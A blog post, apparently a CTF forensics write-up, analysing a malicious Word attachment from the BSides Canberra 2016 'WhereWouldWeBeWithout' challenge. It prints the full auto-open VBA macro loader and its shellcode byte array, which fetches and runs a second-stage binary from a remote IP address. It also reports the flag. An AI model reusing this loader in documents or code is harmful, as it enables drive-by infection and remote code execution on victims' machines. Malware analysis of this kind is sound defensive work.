Writeup – WhereWouldWeBeWithout (Bsides Canberra 2016)

Things have been a little busy over the past week, so here’s a belated writuep for the WhereWouldWeBeWithout challenge at bsides. This challenge was a forensics challenge – the description indicated that a user had downloaded a malicious attachment (supplied), and we needed to identify where the attacker came from.

Initially, I tried unzipping the Word document, only to find that while there was definitely some scripting content inside the doc, it was not in easily-readable text format. Didier Stevens “oledump.py” came to the rescue:

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
#If Vba7 Then
 Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Nsacyiv As Long, ByVal Xfteasxx As Long, ByVal Lzxkfhgja As LongPtr, Pgbsmonke As Long, ByVal Hezaf As Long, Vdpkryp As Long) As LongPtr
 Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Rifi As Long, ByVal Ugdqsefpi As Long, ByVal Obr As Long, ByVal Yinc As Long) As LongPtr
 Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Zilanuijf As LongPtr, ByRef Axg As Any, ByVal Zuosiow As Long) As LongPtr
#Else
 Private Declare Function CreateThread Lib "kernel32" (ByVal Nsacyiv As Long, ByVal Xfteasxx As Long, ByVal Lzxkfhgja As Long, Pgbsmonke As Long, ByVal Hezaf As Long, Vdpkryp As Long) As Long
 Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Rifi As Long, ByVal Ugdqsefpi As Long, ByVal Obr As Long, ByVal Yinc As Long) As Long
 Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal Zilanuijf As Long, ByRef Axg As Any, ByVal Zuosiow As Long) As Long
#End If

Sub Auto_Open()
 Dim Jbqcei As Long, Fwxxsoyv As Variant, Anqyc As Long
#If Vba7 Then
 Dim Ufbxamnhb As LongPtr, Lpazi As LongPtr
#Else
 Dim Ufbxamnhb As Long, Lpazi As Long
#End If
 Fwxxsoyv = Array(232, 137, 0, 0, 0, 96, 137, 229, 49, 210, 100, 139, 82, 48, 139, 82, 12, 139, 82, 20, _
139, 114, 40, 15, 183, 74, 38, 49, 255, 49, 192, 172, 60, 97, 124, 2, 44, 32, 193, 207, _
13, 1, 199, 226, 240, 82, 87, 139, 82, 16, 139, 66, 60, 1, 208, 139, 64, 120, 133, 192, _
116, 74, 1, 208, 80, 139, 72, 24, 139, 88, 32, 1, 211, 227, 60, 73, 139, 52, 139, 1, _
214, 49, 255, 49, 192, 172, 193, 207, 13, 1, 199, 56, 224, 117, 244, 3, 125, 248, 59, 125, _
36, 117, 226, 88, 139, 88, 36, 1, 211, 102, 139, 12, 75, 139, 88, 28, 1, 211, 139, 4, _
139, 1, 208, 137, 68, 36, 36, 91, 91, 97, 89, 90, 81, 255, 224, 88, 95, 90, 139, 18, _
235, 134, 93, 104, 110, 101, 116, 0, 104, 119, 105, 110, 105, 137, 230, 84, 104, 76, 119, 38, _
7, 255, 213, 49, 255, 87, 87, 87, 87, 86, 104, 58, 86, 121, 167, 255, 213, 235, 99, 91, _
49, 201, 81, 81, 106, 3, 81, 81, 104, 187, 1, 0, 0, 83, 80, 104, 87, 137, 159, 198, _
255, 213, 235, 79, 89, 49, 210, 82, 104, 0, 50, 160, 132, 82, 82, 82, 81, 82, 80, 104, _
235, 85, 46, 59, 255, 213, 137, 198, 106, 16, 91, 104, 128, 51, 0, 0, 137, 224, 106, 4, _
80, 106, 31, 86, 104, 117, 70, 158, 134, 255, 213, 49, 255, 87, 87, 87, 87, 86, 104, 45, _
6, 24, 123, 255, 213, 133, 192, 117, 45, 75, 15, 132, 138, 0, 0, 0, 235, 209, 233, 156, _
0, 0, 0, 232, 172, 255, 255, 255, 47, 99, 116, 102, 47, 109, 97, 108, 105, 99, 105, 111, _
117, 115, 95, 98, 105, 110, 97, 114, 121, 46, 101, 120, 101, 0, 235, 107, 49, 192, 95, 80, _
106, 2, 106, 2, 80, 106, 2, 106, 2, 87, 104, 218, 246, 218, 79, 255, 213, 147, 49, 192, _
102, 184, 4, 3, 41, 196, 84, 141, 76, 36, 8, 49, 192, 180, 3, 80, 81, 86, 104, 18, _
150, 137, 226, 255, 213, 133, 192, 116, 45, 88, 133, 192, 116, 22, 106, 0, 84, 80, 141, 68, _
36, 12, 80, 83, 104, 45, 87, 174, 91, 255, 213, 131, 236, 4, 235, 206, 83, 104, 198, 150, _
135, 82, 255, 213, 106, 0, 87, 104, 49, 139, 111, 135, 255, 213, 106, 0, 104, 240, 181, 162, _
86, 255, 213, 232, 144, 255, 255, 255, 114, 117, 110, 100, 49, 49, 46, 101, 120, 101, 0, 232, _
247, 254, 255, 255, 49, 49, 57, 46, 49, 53, 46, 49, 48, 49, 46, 49, 55, 0)

 Ufbxamnhb = VirtualAlloc(0, UBound(Fwxxsoyv), &H1000, &H40)
 For Anqyc = LBound(Fwxxsoyv) To UBound(Fwxxsoyv)
 Jbqcei = Fwxxsoyv(Anqyc)
 Lpazi = RtlMoveMemory(Ufbxamnhb + Anqyc, Jbqcei, 1)
 Next Anqyc
 Lpazi = CreateThread(0, 0, Ufbxamnhb, 0, 0, 0)
End Sub
Sub AutoOpen()
 Auto_Open
End Sub
Sub Workbook_Open()
 Auto_Open
End Sub

The above code is, after a bit of scrolling down, immediately apparent as a loader: that is, it takes bytecode, sticks it into newly allocated memory and creates a new thread. A bit of quick python later, and the binary is out, and we can pop this into IDA Pro. The binary does’t disassemble cleanly (you load it at 0 and need to fiddle with forcing/unforcing code interpretation), but two strings immediately stand out:

seg000:000001BC a119_15_101_17  db '119.15.101.17',0
seg000:00000120 aCtfMalicious_b db '/ctf/malicious_binary.exe'

Given the references to “wininet” elsewhere within the binary, I assumed that this was a web server, on which “malicious_binary.exe” was hosted. I downloaded the binary, and upon loading that into IDA Pro, I was greeted with the familiar smell of Metasploit.

Given the time-limited nature of a CTF, I avoided further reverse engineering, and instead ran the binary in a sandbox, with Wireshark running on a host, quickly revealing the attacker’s origin (d0.ms) and the flag:

BSIDES_CTF{f78b6c32e0369b6d95718fa7d1e2f173}

Props as always to the CTF creators – this was an interesting challenge that eventually led to me investigating the excellent DidierStevensSuite set of tools.

About Norman

Sometimes, I write code. Occasionally, it even works.
This entry was posted in Bards, Computers, Jesting and tagged , , . Bookmark the permalink.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s